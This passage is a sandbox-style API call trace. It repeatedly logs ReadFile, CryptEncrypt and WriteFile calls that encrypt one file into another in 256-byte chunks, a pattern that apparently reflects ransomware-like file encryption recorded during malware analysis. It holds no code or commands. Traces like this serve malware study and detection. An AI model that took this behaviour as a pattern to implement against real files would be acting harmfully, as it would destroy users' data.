lpOverlapped=0x0) returned 1 [0168.298] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.298] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.298] GetLastError () returned 0x0 [0168.298] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.298] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.298] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.298] GetLastError () returned 0x0 [0168.298] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.298] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.299] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.299] GetLastError () returned 0x0 [0168.299] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.299] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.299] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.299] GetLastError () returned 0x0 [0168.299] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.299] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.299] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.299] GetLastError () returned 0x0 [0168.299] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.299] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.299] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.299] GetLastError () returned 0x0 [0168.299] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.299] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.299] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.299] GetLastError () returned 0x0 [0168.299] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.299] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.299] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.299] GetLastError () returned 0x0 [0168.299] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.299] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.299] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.299] GetLastError () returned 0x0 [0168.300] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.300] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.300] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.300] GetLastError () returned 0x0 [0168.300] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.300] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.300] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.300] GetLastError () returned 0x0 [0168.300] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.300] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.300] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.300] GetLastError () returned 0x0 [0168.300] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.300] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.300] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.300] GetLastError () returned 0x0 [0168.300] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.300] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.300] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.300] GetLastError () returned 0x0 [0168.300] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.300] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.300] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.300] GetLastError () returned 0x0 [0168.300] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.301] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.301] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.301] GetLastError () returned 0x0 [0168.301] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.301] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.301] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.301] GetLastError () returned 0x0 [0168.301] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.301] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.301] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.301] GetLastError () returned 0x0 [0168.301] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.301] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.301] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.301] GetLastError () returned 0x0 [0168.301] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.301] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.301] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.301] GetLastError () returned 0x0 [0168.301] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.301] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.301] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.301] GetLastError () returned 0x0 [0168.301] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.301] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.302] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.302] GetLastError () returned 0x0 [0168.302] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.302] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.302] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.302] GetLastError () returned 0x0 [0168.302] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.302] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.302] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.302] GetLastError () returned 0x0 [0168.302] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.302] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.302] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.302] GetLastError () returned 0x0 [0168.302] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.302] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.302] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.302] GetLastError () returned 0x0 [0168.302] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.302] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.302] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.302] GetLastError () returned 0x0 [0168.302] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.302] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.303] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.303] GetLastError () returned 0x0 [0168.303] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.303] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.303] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.303] GetLastError () returned 0x0 [0168.303] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.303] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.303] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.303] GetLastError () returned 0x0 [0168.303] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.303] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.303] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.303] GetLastError () returned 0x0 [0168.303] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.303] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.303] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.303] GetLastError () returned 0x0 [0168.303] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.303] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, 